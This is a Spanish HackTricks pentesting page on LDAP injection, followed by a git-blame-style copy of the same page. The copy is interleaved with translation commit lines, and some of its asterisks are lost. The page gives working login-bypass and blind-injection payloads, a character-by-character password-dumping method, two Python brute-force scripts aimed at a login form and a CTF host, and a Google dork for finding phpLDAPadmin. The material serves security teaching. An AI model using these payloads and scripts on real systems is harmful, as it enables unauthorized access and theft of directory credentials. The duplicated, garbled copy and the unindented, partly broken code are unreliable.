hacktricks/pentesting-web/ldap-injection.md

# Inyección LDAP

## Inyección LDAP

<details>

<summary><strong>Aprende a hackear AWS desde cero hasta convertirte en un experto con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Otras formas de apoyar a HackTricks:

* Si deseas ver tu **empresa anunciada en HackTricks** o **descargar HackTricks en PDF** Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Obtén el [**swag oficial de PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubre [**La Familia PEASS**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Únete al** 💬 [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **síguenos** en **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Comparte tus trucos de hacking enviando PRs a los** [**HackTricks**](https://github.com/carlospolop/hacktricks) y [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositorios de github.

</details>

<figure><img src="../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>

Si estás interesado en una **carrera de hacking** y hackear lo imposible - **¡estamos contratando!** (_se requiere dominio del polaco escrito y hablado_).

{% embed url="https://www.stmcyber.com/careers" %}

## Inyección LDAP

### **LDAP**

**Si deseas saber qué es LDAP accede a la siguiente página:**

{% content-ref url="../network-services-pentesting/pentesting-ldap.md" %}
[pentesting-ldap.md](../network-services-pentesting/pentesting-ldap.md)
{% endcontent-ref %}

La **Inyección LDAP** es un ataque dirigido a aplicaciones web que construyen declaraciones LDAP a partir de la entrada del usuario. Ocurre cuando la aplicación **no sanitiza adecuadamente** la entrada, lo que permite a los atacantes **manipular declaraciones LDAP** a través de un proxy local, lo que potencialmente puede llevar a acceso no autorizado o manipulación de datos.

{% file src="../.gitbook/assets/EN-Blackhat-Europe-2008-LDAP-Injection-Blind-LDAP-Injection.pdf" %}

**Filtro** = ( filtercomp )\
**Filtercomp** = and / or / not / item\
**And** = & filterlist\
**Or** = |filterlist\
**Not** = ! filter\
**Filterlist** = 1\*filter\
**Item**= simple / present / substring\
**Simple** = attr filtertype assertionvalue\
**Filtertype** = _'=' / '\~=' / '>=' / '<='_\
**Present** = attr = \*\
**Substring** = attr ”=” \[initial] \* \[final]\
**Initial** = assertionvalue\
**Final** = assertionvalue\
**(&)** = Verdadero Absoluto\
**(|)** = Falso Absoluto

Por ejemplo:\
`(&(!(objectClass=Impresoras))(uid=s*))`\
`(&(objectClass=user)(uid=*))`

Puedes acceder a la base de datos, la cual puede contener información de muchos tipos diferentes.

**OpenLDAP**: Si llegan 2 filtros, solo ejecuta el primero.\
**ADAM o Microsoft LDS**: Con 2 filtros lanzan un error.\
**SunOne Directory Server 5.0**: Ejecuta ambos filtros.

**Es muy importante enviar el filtro con la sintaxis correcta o se lanzará un error. Es mejor enviar solo 1 filtro.**

El filtro debe comenzar con: `&` o `|`\
Ejemplo: `(&(directory=val1)(folder=public))`

`(&(objectClass=VALUE1)(type=Epson*))`\
`VALUE1 = *)(ObjectClass=*))(&(objectClass=void`

Entonces: `(&(objectClass=`**`*)(ObjectClass=*))`** será el primer filtro (el que se ejecuta).

### Bypass de Inicio de Sesión

LDAP admite varios formatos para almacenar la contraseña: clara, md5, smd5, sh1, sha, crypt. Por lo tanto, podría ser que independientemente de lo que insertes dentro de la contraseña, se haya hasheado.
```bash
user=*
password=*
--> (&(user=*)(password=*))
# The asterisks are great in LDAPi
```

```bash
user=*)(&
password=*)(&
--> (&(user=*)(&)(password=*)(&))
```

```bash
user=*)(|(&
pass=pwd)
--> (&(user=*)(|(&)(pass=pwd))
```

```bash
user=*)(|(password=*
password=test)
--> (&(user=*)(|(password=*)(password=test))
```

```bash
user=*))%00
pass=any
--> (&(user=*))%00 --> Nothing more is executed
```

```bash
user=admin)(&)
password=pwd
--> (&(user=admin)(&))(password=pwd) #Can through an error
```

```bash
username = admin)(!(&(|
pass = any))
--> (&(uid= admin)(!(& (|) (webpassword=any)))) —> As (|) is FALSE then the user is admin and the password check is True.
```

```bash
username=*
password=*)(&
--> (&(user=*)(password=*)(&))
```

```bash
username=admin))(|(|
password=any
--> (&(uid=admin)) (| (|) (webpassword=any))
```
#### Listas

* [LDAP\_FUZZ](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP\_FUZZ.txt)
* [Atributos LDAP](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP\_attributes.txt)
* [Atributos LDAP PosixAccount](https://tldp.org/HOWTO/archived/LDAP-Implementation-HOWTO/schemas.html)

### Inyección LDAP a ciegas

Puede forzar respuestas Falsas o Verdaderas para verificar si se devuelve algún dato y confirmar una posible Inyección LDAP a ciegas:
```bash
#This will result on True, so some information will be shown
Payload: *)(objectClass=*))(&objectClass=void
Final query: (&(objectClass= *)(objectClass=*))(&objectClass=void )(type=Pepi*))
```

```bash
#This will result on True, so no information will be returned or shown
Payload: void)(objectClass=void))(&objectClass=void
Final query: (&(objectClass= void)(objectClass=void))(&objectClass=void )(type=Pepi*))
```
#### Volcar datos

Puedes iterar sobre las letras ASCII, dígitos y símbolos:
```bash
(&(sn=administrator)(password=*))    : OK
(&(sn=administrator)(password=A*))   : KO
(&(sn=administrator)(password=B*))   : KO
...
(&(sn=administrator)(password=M*))   : OK
(&(sn=administrator)(password=MA*))  : KO
(&(sn=administrator)(password=MB*))  : KO
...
```
### Scripts

#### **Descubrir campos LDAP válidos**

Los objetos LDAP **contienen por defecto varios atributos** que podrían ser utilizados para **guardar información**. Puedes intentar **realizar fuerza bruta en todos ellos para extraer esa información**. Puedes encontrar una lista de [**atributos LDAP por defecto aquí**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/Intruder/LDAP\_attributes.txt).
```python
#!/usr/bin/python3
import requests
import string
from time import sleep
import sys

proxy = { "http": "localhost:8080" }
url = "http://10.10.10.10/login.php"
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"

attributes = ["c", "cn", "co", "commonName", "dc", "facsimileTelephoneNumber", "givenName", "gn", "homePhone", "id", "jpegPhoto", "l", "mail", "mobile", "name", "o", "objectClass", "ou", "owner", "pager", "password", "sn", "st", "surname", "uid", "username", "userPassword",]

for attribute in attributes: #Extract all attributes
value = ""
finish = False
while not finish:
for char in alphabet: #In each possition test each possible printable char
query = f"*)({attribute}={value}{char}*"
data = {'login':query, 'password':'bla'}
r = requests.post(url, data=data, proxies=proxy)
sys.stdout.write(f"\r{attribute}: {value}{char}")
#sleep(0.5) #Avoid brute-force bans
if "Cannot login" in r.text:
value += str(char)
break

if char == alphabet[-1]: #If last of all the chars, then, no more chars in the value
finish = True
print()
```
#### **Inyección LDAP ciega especial (sin "\*")**
```python
#!/usr/bin/python3

import requests, string
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"

flag = ""
for i in range(50):
print("[i] Looking for number " + str(i))
for char in alphabet:
r = requests.get("http://ctf.web??action=dir&search=admin*)(password=" + flag + char)
if ("TRUE CONDITION" in r.text):
flag += char
print("[+] Flag: " + flag)
break
```
### Google Dorks
```bash
intitle:"phpLDAPadmin" inurl:cmd.php
```
### Más Payloads

{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection" %}

<figure><img src="../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>

Si estás interesado en **una carrera en hacking** y hackear lo imposible - **¡estamos contratando!** (_se requiere dominio del polaco escrito y hablado_).

{% embed url="https://www.stmcyber.com/careers" %}

<details>

<summary><strong>Aprende hacking en AWS de cero a héroe con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Otras formas de apoyar a HackTricks:

* Si quieres ver tu **empresa anunciada en HackTricks** o **descargar HackTricks en PDF** ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Obtén el [**oficial PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Únete al** 💬 [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **síguenos** en **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Comparte tus trucos de hacking enviando PRs a los** [**HackTricks**](https://github.com/carlospolop/hacktricks) y [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositorios de github.

</details>
Translated ['README.md', 'binary-exploitation/format-strings/README.md', 2024-04-15 03:55:15 +00:00			`# Inyección LDAP`
f 2023-06-05 18:33:24 +00:00
			`## Inyección LDAP`

			`<details>`

Translated ['binary-exploitation/basic-binary-exploitation-methodology/t 2024-04-17 05:37:49 +00:00			`<summary><strong>Aprende a hackear AWS desde cero hasta convertirte en un experto con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
f 2023-06-05 18:33:24 +00:00
Translated ['forensics/basic-forensic-methodology/windows-forensics/READ 2024-02-03 15:59:53 +00:00			`Otras formas de apoyar a HackTricks:`

Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 21:58:36 +00:00			`* Si deseas ver tu empresa anunciada en HackTricks o descargar HackTricks en PDF Consulta los [PLANES DE SUSCRIPCIÓN](https://github.com/sponsors/carlospolop)!`
			`* Obtén el [swag oficial de PEASS & HackTricks](https://peass.creator-spring.com)`
Translated ['binary-exploitation/basic-binary-exploitation-methodology/t 2024-04-17 05:37:49 +00:00			`* Descubre [La Familia PEASS](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [NFTs](https://opensea.io/collection/the-peass-family)`
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 21:58:36 +00:00			`* Únete al 💬 [grupo de Discord](https://discord.gg/hRep4RUj7f) o al [grupo de telegram](https://t.me/peass) o síguenos en Twitter 🐦 [@carlospolopm](https://twitter.com/hacktricks\_live).`
			`* Comparte tus trucos de hacking enviando PRs a los [HackTricks](https://github.com/carlospolop/hacktricks) y [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) repositorios de github.`
f 2023-06-05 18:33:24 +00:00
			`</details>`

Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 21:58:36 +00:00			`<figure><img src="../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>`
Translated ['forensics/basic-forensic-methodology/specific-software-file 2024-02-18 14:52:40 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 21:58:36 +00:00			`Si estás interesado en una carrera de hacking y hackear lo imposible - ¡estamos contratando! (_se requiere dominio del polaco escrito y hablado_).`
f 2023-06-05 18:33:24 +00:00
Translated ['forensics/basic-forensic-methodology/specific-software-file 2024-02-18 14:52:40 +00:00			`{% embed url="https://www.stmcyber.com/careers" %}`
f 2023-06-05 18:33:24 +00:00
Translated ['forensics/basic-forensic-methodology/windows-forensics/READ 2024-02-03 15:59:53 +00:00			`## Inyección LDAP`

f 2023-06-05 18:33:24 +00:00			`### LDAP`

Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 21:58:36 +00:00			`Si deseas saber qué es LDAP accede a la siguiente página:`
f 2023-06-05 18:33:24 +00:00
			`{% content-ref url="../network-services-pentesting/pentesting-ldap.md" %}`
			`[pentesting-ldap.md](../network-services-pentesting/pentesting-ldap.md)`
			`{% endcontent-ref %}`

Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 21:58:36 +00:00			`La Inyección LDAP es un ataque dirigido a aplicaciones web que construyen declaraciones LDAP a partir de la entrada del usuario. Ocurre cuando la aplicación no sanitiza adecuadamente la entrada, lo que permite a los atacantes manipular declaraciones LDAP a través de un proxy local, lo que potencialmente puede llevar a acceso no autorizado o manipulación de datos.`
f 2023-06-05 18:33:24 +00:00
Translated ['README.md', 'binary-exploitation/format-strings/README.md', 2024-04-15 03:55:15 +00:00			`{% file src="../.gitbook/assets/EN-Blackhat-Europe-2008-LDAP-Injection-Blind-LDAP-Injection.pdf" %}`
f 2023-06-05 18:33:24 +00:00
			`Filtro = ( filtercomp )\`
			`Filtercomp = and / or / not / item\`
			`And = & filterlist\`
			`Or = \|filterlist\`
			`Not = ! filter\`
			`Filterlist = 1\*filter\`
			`Item= simple / present / substring\`
			`Simple = attr filtertype assertionvalue\`
			`Filtertype = _'=' / '\~=' / '>=' / '<='_\`
			`Present = attr = \*\`
			`Substring = attr ”=” \[initial] \* \[final]\`
			`Initial = assertionvalue\`
			`Final = assertionvalue\`
Translated ['binary-exploitation/basic-binary-exploitation-methodology/t 2024-04-17 05:37:49 +00:00			`(&) = Verdadero Absoluto\`
			`(\|) = Falso Absoluto`
f 2023-06-05 18:33:24 +00:00
			`Por ejemplo:\`
			`(&(!(objectClass=Impresoras))(uid=s*))`\
			`(&(objectClass=user)(uid=*))`

Translated ['README.md', 'binary-exploitation/format-strings/README.md', 2024-04-15 03:55:15 +00:00			`Puedes acceder a la base de datos, la cual puede contener información de muchos tipos diferentes.`
f 2023-06-05 18:33:24 +00:00
			`OpenLDAP: Si llegan 2 filtros, solo ejecuta el primero.\`
Translated ['forensics/basic-forensic-methodology/windows-forensics/READ 2024-02-03 15:59:53 +00:00			`ADAM o Microsoft LDS: Con 2 filtros lanzan un error.\`
f 2023-06-05 18:33:24 +00:00			`SunOne Directory Server 5.0: Ejecuta ambos filtros.`

			`Es muy importante enviar el filtro con la sintaxis correcta o se lanzará un error. Es mejor enviar solo 1 filtro.`

			El filtro debe comenzar con: `&` o `\|`\
			Ejemplo: `(&(directory=val1)(folder=public))`

			`(&(objectClass=VALUE1)(type=Epson*))`\
			`VALUE1 = )(ObjectClass=))(&(objectClass=void`

			Entonces: `(&(objectClass=`*`)(ObjectClass=))`* será el primer filtro (el que se ejecuta).

Translated ['forensics/basic-forensic-methodology/specific-software-file 2024-02-18 14:52:40 +00:00			`### Bypass de Inicio de Sesión`
f 2023-06-05 18:33:24 +00:00
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat 2024-03-29 20:55:41 +00:00			`LDAP admite varios formatos para almacenar la contraseña: clara, md5, smd5, sh1, sha, crypt. Por lo tanto, podría ser que independientemente de lo que insertes dentro de la contraseña, se haya hasheado.`
f 2023-06-05 18:33:24 +00:00			```bash
			`user=*`
			`password=*`
			`--> (&(user=)(password=))`
			`# The asterisks are great in LDAPi`
			```

			```bash
			`user=*)(&`
			`password=*)(&`
			`--> (&(user=)(&)(password=)(&))`
			```

			```bash
			`user=*)(\|(&`
			`pass=pwd)`
			`--> (&(user=*)(\|(&)(pass=pwd))`
			```

			```bash
			`user=)(\|(password=`
			`password=test)`
			`--> (&(user=)(\|(password=)(password=test))`
			```

			```bash
			`user=*))%00`
			`pass=any`
			`--> (&(user=*))%00 --> Nothing more is executed`
			```

			```bash
			`user=admin)(&)`
			`password=pwd`
			`--> (&(user=admin)(&))(password=pwd) #Can through an error`
			```

			```bash
			`username = admin)(!(&(\|`
			`pass = any))`
			`--> (&(uid= admin)(!(& (\|) (webpassword=any)))) —> As (\|) is FALSE then the user is admin and the password check is True.`
			```

			```bash
			`username=*`
			`password=*)(&`
			`--> (&(user=)(password=)(&))`
			```

			```bash
			`username=admin))(\|(\|`
			`password=any`
			`--> (&(uid=admin)) (\| (\|) (webpassword=any))`
			```
			`#### Listas`

			`* [LDAP\_FUZZ](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP\_FUZZ.txt)`
			`* [Atributos LDAP](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP\_attributes.txt)`
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:06:30 +00:00			`* [Atributos LDAP PosixAccount](https://tldp.org/HOWTO/archived/LDAP-Implementation-HOWTO/schemas.html)`
f 2023-06-05 18:33:24 +00:00
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:06:30 +00:00			`### Inyección LDAP a ciegas`
f 2023-06-05 18:33:24 +00:00
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:06:30 +00:00			`Puede forzar respuestas Falsas o Verdaderas para verificar si se devuelve algún dato y confirmar una posible Inyección LDAP a ciegas:`
f 2023-06-05 18:33:24 +00:00			```bash
			`#This will result on True, so some information will be shown`
			`Payload: )(objectClass=))(&objectClass=void`
			`Final query: (&(objectClass= )(objectClass=))(&objectClass=void )(type=Pepi*))`
			```

			```bash
			`#This will result on True, so no information will be returned or shown`
			`Payload: void)(objectClass=void))(&objectClass=void`
			`Final query: (&(objectClass= void)(objectClass=void))(&objectClass=void )(type=Pepi*))`
			```
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:06:30 +00:00			`#### Volcar datos`
f 2023-06-05 18:33:24 +00:00
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:06:30 +00:00			`Puedes iterar sobre las letras ASCII, dígitos y símbolos:`
f 2023-06-05 18:33:24 +00:00			```bash
			`(&(sn=administrator)(password=*)) : OK`
			`(&(sn=administrator)(password=A*)) : KO`
			`(&(sn=administrator)(password=B*)) : KO`
			`...`
			`(&(sn=administrator)(password=M*)) : OK`
			`(&(sn=administrator)(password=MA*)) : KO`
			`(&(sn=administrator)(password=MB*)) : KO`
			`...`
			```
			`### Scripts`

			`#### Descubrir campos LDAP válidos`

Translated ['README.md', 'binary-exploitation/format-strings/README.md', 2024-04-15 03:55:15 +00:00			`Los objetos LDAP contienen por defecto varios atributos que podrían ser utilizados para guardar información. Puedes intentar realizar fuerza bruta en todos ellos para extraer esa información. Puedes encontrar una lista de [atributos LDAP por defecto aquí](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/Intruder/LDAP\_attributes.txt).`
f 2023-06-05 18:33:24 +00:00			```python
			`#!/usr/bin/python3`
			`import requests`
			`import string`
			`from time import sleep`
			`import sys`

			`proxy = { "http": "localhost:8080" }`
			`url = "http://10.10.10.10/login.php"`
			`alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"`

			`attributes = ["c", "cn", "co", "commonName", "dc", "facsimileTelephoneNumber", "givenName", "gn", "homePhone", "id", "jpegPhoto", "l", "mail", "mobile", "name", "o", "objectClass", "ou", "owner", "pager", "password", "sn", "st", "surname", "uid", "username", "userPassword",]`

			`for attribute in attributes: #Extract all attributes`
Translated ['forensics/basic-forensic-methodology/windows-forensics/READ 2024-02-03 15:59:53 +00:00			`value = ""`
			`finish = False`
			`while not finish:`
			`for char in alphabet: #In each possition test each possible printable char`
			`query = f")({attribute}={value}{char}"`
			`data = {'login':query, 'password':'bla'}`
			`r = requests.post(url, data=data, proxies=proxy)`
			`sys.stdout.write(f"\r{attribute}: {value}{char}")`
			`#sleep(0.5) #Avoid brute-force bans`
			`if "Cannot login" in r.text:`
			`value += str(char)`
			`break`

			`if char == alphabet[-1]: #If last of all the chars, then, no more chars in the value`
			`finish = True`
			`print()`
f 2023-06-05 18:33:24 +00:00			```
			`#### *Inyección LDAP ciega especial (sin "\")**`
			```python
			`#!/usr/bin/python3`

			`import requests, string`
			`alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"`

			`flag = ""`
			`for i in range(50):`
Translated ['forensics/basic-forensic-methodology/windows-forensics/READ 2024-02-03 15:59:53 +00:00			`print("[i] Looking for number " + str(i))`
			`for char in alphabet:`
			`r = requests.get("http://ctf.web??action=dir&search=admin*)(password=" + flag + char)`
			`if ("TRUE CONDITION" in r.text):`
			`flag += char`
			`print("[+] Flag: " + flag)`
			`break`
f 2023-06-05 18:33:24 +00:00			```
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 21:58:36 +00:00			`### Google Dorks`
f 2023-06-05 18:33:24 +00:00			```bash
			`intitle:"phpLDAPadmin" inurl:cmd.php`
			```
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat 2024-03-29 20:55:41 +00:00			`### Más Payloads`
f 2023-06-05 18:33:24 +00:00
			`{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection" %}`

Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 21:58:36 +00:00			`<figure><img src="../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>`
f 2023-06-05 18:33:24 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 21:58:36 +00:00			`Si estás interesado en una carrera en hacking y hackear lo imposible - ¡estamos contratando! (_se requiere dominio del polaco escrito y hablado_).`
Translated ['forensics/basic-forensic-methodology/specific-software-file 2024-02-18 14:52:40 +00:00
			`{% embed url="https://www.stmcyber.com/careers" %}`
f 2023-06-05 18:33:24 +00:00
			`<details>`

Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 21:58:36 +00:00			`<summary><strong>Aprende hacking en AWS de cero a héroe con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
Translated ['forensics/basic-forensic-methodology/windows-forensics/READ 2024-02-03 15:59:53 +00:00
			`Otras formas de apoyar a HackTricks:`
f 2023-06-05 18:33:24 +00:00
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat 2024-03-29 20:55:41 +00:00			`* Si quieres ver tu empresa anunciada en HackTricks o descargar HackTricks en PDF ¡Consulta los [PLANES DE SUSCRIPCIÓN](https://github.com/sponsors/carlospolop)!`
Translated ['binary-exploitation/basic-binary-exploitation-methodology/t 2024-04-17 05:37:49 +00:00			`* Obtén el [oficial PEASS & HackTricks swag](https://peass.creator-spring.com)`
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat 2024-03-29 20:55:41 +00:00			`* Descubre [The PEASS Family](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [NFTs](https://opensea.io/collection/the-peass-family)`
Translated ['forensics/basic-forensic-methodology/specific-software-file 2024-02-18 14:52:40 +00:00			`* Únete al 💬 [grupo de Discord](https://discord.gg/hRep4RUj7f) o al [grupo de telegram](https://t.me/peass) o síguenos en Twitter 🐦 [@carlospolopm](https://twitter.com/hacktricks\_live).`
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 21:58:36 +00:00			`* Comparte tus trucos de hacking enviando PRs a los [HackTricks](https://github.com/carlospolop/hacktricks) y [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) repositorios de github.`
f 2023-06-05 18:33:24 +00:00
			`</details>`